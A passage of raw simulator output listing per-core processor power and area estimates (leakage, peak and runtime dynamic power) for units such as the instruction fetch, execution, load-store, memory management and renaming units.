Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.331987, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0448131, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.60111, 'Memory Management Unit/Runtime Dynamic': 0.10923, 'Memory Management Unit/Subthreshold Leakage': 0.0769113, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462, 'Peak Dynamic': 22.3836, 'Renaming Unit/Area': 0.369768, 'Renaming Unit/FP Front End RAT/Area': 0.168486, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 2.00155e-05, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925, 'Renaming Unit/Free List/Area': 0.0414755, 'Renaming Unit/Free List/Gate Leakage': 4.15911e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0401324, 'Renaming Unit/Free List/Runtime Dynamic': 0.0166548, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987, 'Renaming Unit/Gate Leakage': 0.00863632, 'Renaming Unit/Int Front End RAT/Area': 0.114751, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.17093, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781, 'Renaming Unit/Peak Dynamic': 4.56169, 'Renaming Unit/Runtime Dynamic': 0.187605, 'Renaming Unit/Subthreshold Leakage': 0.070483, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779, 'Runtime Dynamic': 4.99848, 'Subthreshold Leakage': 6.21877, 'Subthreshold Leakage with power gating': 2.58311}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 9.4469e-07, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.20269, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.187504, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.302436, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.15266, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.6426, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.214446, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 4.24255, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00786475, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0568717, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0581646, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.0568755, 'Execution Unit/Register Files/Runtime Dynamic': 0.0660294, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.119813, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.321632, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 1.63833, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00218605, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00218605, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00197094, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000799573, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000835539, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00717857, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0185694, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0559151, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.55668, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.17826, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.189913, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 5.94781, 'Instruction Fetch Unit/Runtime Dynamic': 0.449836, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0335487, 'L2/Runtime Dynamic': 0.0089839, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 2.74279, 'Load Store Unit/Data Cache/Runtime Dynamic': 0.736561, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.048712, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0487119, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 2.97282, 'Load Store Unit/Runtime Dynamic': 1.0255, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.120115, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.240231, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0426294, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0429123, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.221141, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0298772, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.45048, 'Memory Management Unit/Runtime Dynamic': 0.0727895, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 17.2367, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 9.80115e-06, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.00845977, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0963126, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.104782, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 3.30022, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 9.4469e-07, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.20269, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.187513, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.302452, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.152667, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.642632, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.214458, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 4.24257, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00786514, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0568748, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0581675, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.0568786, 'Execution Unit/Register Files/Runtime Dynamic': 0.0660327, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.119819, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.321648, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 1.63838, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00218616, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00218616, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00197105, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000799617, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000835581, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00717896, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0185704, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0559179, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.55686, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.17827, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.189922, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 5.948, 'Instruction Fetch Unit/Runtime Dynamic': 0.44986, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0335487, 'L2/Runtime Dynamic': 0.00898508, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 2.74287, 'Load Store Unit/Data Cache/Runtime Dynamic': 0.736603, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0487145, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0487146, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 2.97291, 'Load Store Unit/Runtime Dynamic': 1.02556, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.120122, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.240244, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0426316, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0429147, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 